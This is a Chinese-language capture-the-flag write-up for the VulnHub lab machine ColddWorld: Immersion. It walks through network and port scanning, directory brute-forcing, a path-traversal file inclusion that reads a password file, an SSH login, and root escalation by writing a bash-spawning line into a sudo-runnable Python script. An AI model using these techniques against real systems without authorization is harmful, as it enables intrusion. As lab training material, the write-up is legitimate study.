COLDDWORLD: IMMERSION

目录

靶机下载地址:ColddWorld: Immersion ~ VulnHub

目标:取得两个flag

 一、信息收集

1. 确认靶机IP

2. 端口扫描

3. 使用浏览器访问80端口网页

   3.1 查看源码

4. 使用gobuster爆破目录

5. 访问login界面

   5.1 弱密码尝试 查看网页回显信息

6. 查看登陆界面源码

二、渗透过程

1. 获取密码

  1.1文件包含漏洞利用

  1.2 base64解码

2. ssh远程连接

3. 取得两个flag

   3.1 获得第一个flag

3.2 提权

3.3 获得第二个flag


 

靶机下载地址:ColddWorld: Immersion ~ VulnHub

 

目标:取得两个flag

 

 一、信息收集

1. 确认靶机IP

┌──(kali💋kali)-[~]
└─$ sudo arp-scan -I eth0 10.9.23.0/24             #(指定网卡扫描)

b4bf9b7924dc4406a5bda609837f392a.png

2. 端口扫描

使用nmap进行全端口扫描

┌──(kali💋kali)-[~]
└─$ sudo nmap -A -p- 10.9.23.231

 

# -A 全面扫描,获取更多的信息
# -p- 全端口扫描,扫描主机上0-65535个端口

c0f17325b2604171aaa84fcf61d298ac.png

开放端口信息
PORTSTATESERVICEVERSION
80openhttpApache httpd 2.4.18 ((Ubuntu))
3042opensshOpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

3. 使用浏览器访问80端口网页

3654e9716b5c4d3080f08c017cb1001d.png

   3.1 查看源码

     源码无可用信息

28a18a2d6b1147888d1b36f8da892ae2.png

4. 使用gobuster爆破目录

┌──(kali💋kali)-[~]
└─$ gobuster dir -u http://10.9.23.231 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,html,js,zip

 

# dir 目录爆破模式

# -u 指定目标URL

# -w 指定目录字典

# -x 指定扫描的文件后缀

3eb2730716a840a0a2e63519083898e7.png

5. 访问login界面

ad4e447d81714ed2b8e84e6b169712c7.png

   5.1 弱密码尝试 查看网页回显信息

     第一次尝试

b909f9d14b7d4aeebb5d3e0242383296.png

     第二次尝试......

6e3c768450c6439ea2dd08a2f243c357.png

   经过几次尝试,发现不管我们怎么登陆网页都会重定向到空白页

6. 查看登陆界面源码

f3bc82d0fe404743b56fa0f4b4bd2547.png

在源码界面我发现了两个用户名carls,c0ldd,以及c0ldd留下的一条消息:密码留在了/var下的名为carls.txt的文件中

并且通过提示account.php界面存在文件包含漏洞,并且使用get传参,我们可以直接通过URL去访问carls.txt文件

二、渗透过程

1. 获取密码

  1.1文件包含漏洞利用

   获取carls用户密码

http://10.9.23.231/login/account.php?page=../../../../var/carls.txt

33a3e550671441b68f7b36f9709bd5c6.png

成功获得密码:Y2FybG9z

  1.2 base64解码

密码为base64编码,利用burp suite Decoder模块进行解码:carlos

bcb429afd60041abb92a143c5067f58e.png

2. ssh远程连接

┌──(kali💋kali)-[~]
└─$ ssh carls@10.9.23.231 -p 3042

 

# 密码:carlos

# -p 指定端口连接

9dc11793b48c4b2e9bf0ec326c489cca.png

3. 取得两个flag

执行sudo -l

可以看到我们可以作为carls用户直接执行c0ldd用户的/bin/bash命令

b71aa57b313b46d6a6ea7ea21fabd2c8.png

执行/bin/bash

d175c9b2c8a5493e8b3f1af378b821b1.png

   3.1 获得第一个flag

1e09a930664a415dbad136286a97cbce.png

再次执行sudo -l

我们可以以root身份执行DoNotRun.py文件

9b81bce22e264aa8b287758bccf9631c.png

使用vim编辑器将

import os

os.system("/bin/bash")       写入到py文件中   wq!保存

c7d6737cd609424dbe4bc584cfac6617.png

1e2b6b8702c243ed8c5de4793a37875c.png

3.2 提权

执行DoNotRun.py

sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py

提权成功!

41fc892501ff487d8d71b2fcaf1f0dc3.png

3.3 获得第二个flag

echo 'RmVsaWNpZGFkZXMgY3JhY2s=' | base64 -d

222d540e84cc45c9a12641210428c680.png

 

 

  • 33
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值